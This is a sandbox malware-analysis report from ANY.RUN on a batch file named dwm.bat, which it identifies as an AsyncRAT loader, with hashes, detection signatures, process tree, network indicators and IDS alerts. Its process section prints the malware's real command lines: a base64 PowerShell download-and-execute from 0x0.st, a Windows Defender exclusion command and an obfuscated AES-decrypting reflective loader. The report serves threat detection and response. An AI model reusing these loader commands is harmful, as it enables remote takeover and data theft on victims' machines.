File name:

dwm.bat

Full analysis: https://app.any.run/tasks/27f1a007-4225-484f-8ee1-f172dc1aa4d1
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Malware Trends Tracker     >>>
Analysis date: January 30, 2025, 08:27:28
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
susp-powershell
stealer
fody
rat
asyncrat
remote
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (57718), with CRLF line terminators
MD5:

151B7FE444AF5423AD79C0C83558B402

SHA1:

664D48C7C188A5085FDE5A50842F63F5F2191BFE

SHA256:

DF22C1BF851BE9C64682E7838B6B88358C64A9E3FD6E8AD305F7303D06660323

SSDEEP:

12288:O3WghT6onokzHxgSVW0U/cBGnciS8mJa4Ce:4hT5i9/cBGhFmJaze

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 3848)
      • powershell.exe (PID: 4120)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3536)

    • Known privilege escalation attack

      • dllhost.exe (PID: 3568)

    • Adds process to the Windows Defender exclusion list

      • dllhost.exe (PID: 3568)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 4120)

    • ASYNCRAT has been detected (SURICATA)

      • powershell.exe (PID: 4120)

  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 1704)

    • Application launched itself

      • cmd.exe (PID: 1704)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1704)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3536)
      • dllhost.exe (PID: 3568)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3536)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 3536)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6784)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 6784)

    • Script adds exclusion process to Windows Defender

      • dllhost.exe (PID: 3568)

    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • powershell.exe (PID: 4500)

    • Script adds exclusion path to Windows Defender

      • dllhost.exe (PID: 3568)

    • Uses TASKKILL.EXE to kill process

      • dllhost.exe (PID: 3568)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 4120)

    • Connects to unusual port

      • powershell.exe (PID: 4120)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 4120)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 4500)

    • Checks proxy server information

      • powershell.exe (PID: 4500)
      • powershell.exe (PID: 4120)

    • Found Base64 encoded network access via PowerShell (YARA)

      • cmd.exe (PID: 3536)
      • powershell.exe (PID: 4500)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 4500)

    • Found Base64 encoded file access via PowerShell (YARA)

      • cmd.exe (PID: 3536)

    • Checks supported languages

      • csc.exe (PID: 6784)
      • cvtres.exe (PID: 6920)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 6784)

    • Create files in a temporary directory

      • cvtres.exe (PID: 6920)
      • csc.exe (PID: 6784)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3848)

    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 6984)

    • Creates files in the program directory

      • dllhost.exe (PID: 3568)

    • Detects Fody packer (YARA)

      • powershell.exe (PID: 4500)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3848)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4120)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4120)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
142
Monitored processes
15
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe csc.exe cvtres.exe no specs cmstp.exe no specs CMSTPLUA powershell.exe no specs conhost.exe no specs #ASYNCRAT powershell.exe taskkill.exe no specs conhost.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
1704C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\dwm.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2144\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3536C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\dwm.bat" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
3568C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\System32\dllhost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
3820\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3848powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exedllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\atl.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\msvcp_win.dll
4120"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24gamlqeHJrdXJjcmhzdXJzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnVFhPeWhHNkc0RTQzM3MyT0ZlMTlMdm5Gekd2VjBENS82d250aUx1TDZqOD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1pHa1o1c2M2UVhkcld6WFhZSUlrSHc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWVxdGJwb3hrdWxxbmR0KCRwYXJhbV92YXIpewlJRVggJyR1aGNtaW5rYWF3cGduenRsaXptbHBvd2ZlPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHVsemRndGhvand6cWhqZnhlcHdsaWJ4cWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkcmFyZGZsd2huYmx3dWNpcmRjdXZhcGhuPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJHVoY21pbmthYXdwZ256dGxpem1scG93ZmUsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGRyYXJkZmx3aG5ibHd1Y2lyZGN1dmFwaG4uQ29weVRvKCR1bHpkZ3Rob2p3enFoamZ4ZXB3bGlieHFpKTsJJGRyYXJkZmx3aG5ibHd1Y2lyZGN1dmFwaG4uRGlzcG9zZSgpOwkkdWhjbWlua2Fhd3Bnbnp0bGl6bWxwb3dmZS5EaXNwb3NlKCk7CSR1bHpkZ3Rob2p3enFoamZ4ZXB3bGlieHFpLkRpc3Bvc2UoKTsJJHVsemRndGhvand6cWhqZnhlcHdsaWJ4cWkuVG9BcnJheSgpO31mdW5jdGlvbiB6d2pncnd1eHNna3hwcWJkZHJmdHRlcGd0KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbHp6dHZ0bml1ZGNod2Zxb3Rhd2RtaHV0ZHJ4dXduY2NzZXNnbWNtdD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG9jY3JhYXZ5bWdjYXNlYmVlZnFldnNtZ2Fhb3Nta2NxbmNwamVkdGN2emlwbGJqbmNvPSRsenp0dnRuaXVkY2h3ZnFvdGF3ZG1odXRkcnh1d25jY3Nlc2dtY210LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG9jY3JhYXZ5bWdjYXNlYmVlZnFldnNtZ2Fhb3Nta2NxbmNwamVkdGN2emlwbGJqbmNvLkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kb3lubmZjcnN1cGl2ZHBuZ21sa3htaGFqeSA9ICRlbnY6VVNFUk5BTUU7JGdqbmtiZWp1Z2djempudGd0amdlaWV0a3ogPSAnQzpcVXNlcnNcJyArICRveW5uZmNyc3VwaXZkcG5nbWxreG1oYWp5ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZ2pua2JlanVnZ2N6am50Z3RqZ2VpZXRrejskeWxrd2s9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRnam5rYmVqdWdnY3pqbnRndGpnZWlldGt6KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdHp4IGluICR5bGt3aykgewlpZiAoJHR6eC5TdGFydHNXaXRoKCc6OicpKQl7CQkkY3BjbGM9JHR6eC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kcGRub2hzdml5aXhqdnJkdGhsc2lubGJtZj1bc3RyaW5nW11dJGNwY2xjLlNwbGl0KCdcJyk7SUVYICckc3B0enl3bGZoZmZlYXR3dm5vc2dud3Z2Zz1pZXF0YnBveGt1bHFuZHQgKGppanhya3VyY3Joc3VycyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRwZG5vaHN2aXlpeGp2cmR0aGxzaW5sYm1mWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHJtbnBxZWJham9jY2l6bG1lb2x5cGhzd209aWVxdGJwb3hrdWxxbmR0IChqaWp4cmt1cmNyaHN1cnMgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkcGRub2hzdml5aXhqdnJkdGhsc2lubGJtZlsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt6d2pncnd1eHNna3hwcWJkZHJmdHRlcGd0ICRzcHR6eXdsZmhmZmVhdHd2bm9zZ253dnZnICRudWxsO3p3amdyd3V4c2dreHBxYmRkcmZ0dGVwZ3QgJHJtbnBxZWJham9jY2l6bG1lb2x5cGhzd20gKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
4500powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5652\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 222
Read events
18 196
Write events
26
Delete events
0

Modification events

(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileTracingMask
Value:
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(6984) cmstp.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3568) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe
Operation:writeName:ProfileInstallPath
Value:
C:\ProgramData\Microsoft\Network\Connections\Cm
(PID) Process:(6984) cmstp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Network Connections
Operation:writeName:DesktopShortcut
Value:
0
(PID) Process:(3568) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Operation:writeName:SM_AccessoriesName
Value:
Accessories
Executable files
2
Suspicious files
7
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
6784csc.exeC:\Users\admin\AppData\Local\Temp\vyxgcijg.dllexecutable
MD5:0D5AC81212B21B55DD9BC5461A325CB9
SHA256:96814DAABFBD352865E3FFD40EB1C2E9F1FCD8C6311FE858D1675C908C8F4F69
4500powershell.exeC:\Windows\Temp\dnb3vetm.inftext
MD5:05662B83FF7DB6317E391454787598D8
SHA256:0322B78214D9FB1D40D9BF162A44F9A5FE13FCB21C96B8B0F0E289E939A9FA5C
6920cvtres.exeC:\Users\admin\AppData\Local\Temp\RES9195.tmpbinary
MD5:EAFC9AEBC301A68060F47819BE7E5C34
SHA256:06F2F3027847C4D071183249E3BAC8F93BED794E9A4E06ABB6B3758544018A52
4500powershell.exeC:\Users\admin\AppData\Local\Temp\vyxgcijg.0.cstext
MD5:B126AC3DA39FFA35CB857267CBC70CBB
SHA256:6E6DD39153A84B94B4F309A4C4521260CBDD8A6922ADE46096F42DA39BC20B93
6784csc.exeC:\Users\admin\AppData\Local\Temp\CSC10A73122AECC4C8D9594F3EA6BEF9AB.TMPbinary
MD5:9505958D90497DCF4CE8D50DB32BF29F
SHA256:623D9855F1BE340A906693C228DCC868F93786ED01E6BC3427EFAC7269860676
6784csc.exeC:\Users\admin\AppData\Local\Temp\vyxgcijg.outtext
MD5:5859DC6A9DDD860D3A9F8D9DBAC9AE82
SHA256:18D6CBBEC1B24FE69585BDFD487870B363DFCD89EEC5905E56CBB70F913993FF
4500powershell.exeC:\Users\admin\AppData\Local\Temp\vyxgcijg.cmdlinetext
MD5:9829CEE0F227177ADBCE212E2822794F
SHA256:7CFD43BD1449DA12459475B69213BF9C6511370CA646A0F9B8E7DD4D0671C782
3848powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RP5X48NBYGR8AYVSY94S.tempbinary
MD5:E9ADC7F941C7D5A31CCC346DBD7635E4
SHA256:0DC7697F04A2EA776D6BF2A92747B3132FBDDEA0DAD5F667C25F47070A0F7B15
3848powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF139fcd.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
3848powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:E9ADC7F941C7D5A31CCC346DBD7635E4
SHA256:0DC7697F04A2EA776D6BF2A92747B3132FBDDEA0DAD5F667C25F47070A0F7B15
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
33
DNS requests
16
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6332
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6332
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6700
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1344
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5064
SearchApp.exe
104.126.37.128:443
Akamai International B.V.
DE
unknown
3976
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4500
powershell.exe
168.119.145.117:443
0x0.st
Hetzner Online GmbH
DE
suspicious
5064
SearchApp.exe
104.126.37.176:443
Akamai International B.V.
DE
unknown
5064
SearchApp.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
1176
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
www.microsoft.com
  • 184.30.21.171
whitelisted
0x0.st
  • 168.119.145.117
unknown
ocsp.digicert.com
  • 184.30.131.245
  • 2.23.77.188
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.128
  • 20.190.160.130
  • 40.126.32.140
  • 40.126.32.133
  • 40.126.32.74
  • 20.190.160.67
  • 20.190.160.17
whitelisted
go.microsoft.com
  • 184.30.18.9
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted
fd.api.iris.microsoft.com
  • 20.74.47.205
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (0x0 .st)
4500
powershell.exe
Misc activity
ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
4120
powershell.exe
Misc activity
ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2192
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
4120
powershell.exe
Domain Observed Used for C2 Detected
ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert
4120
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] AsyncRAT Successful Connection
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
dwm.bat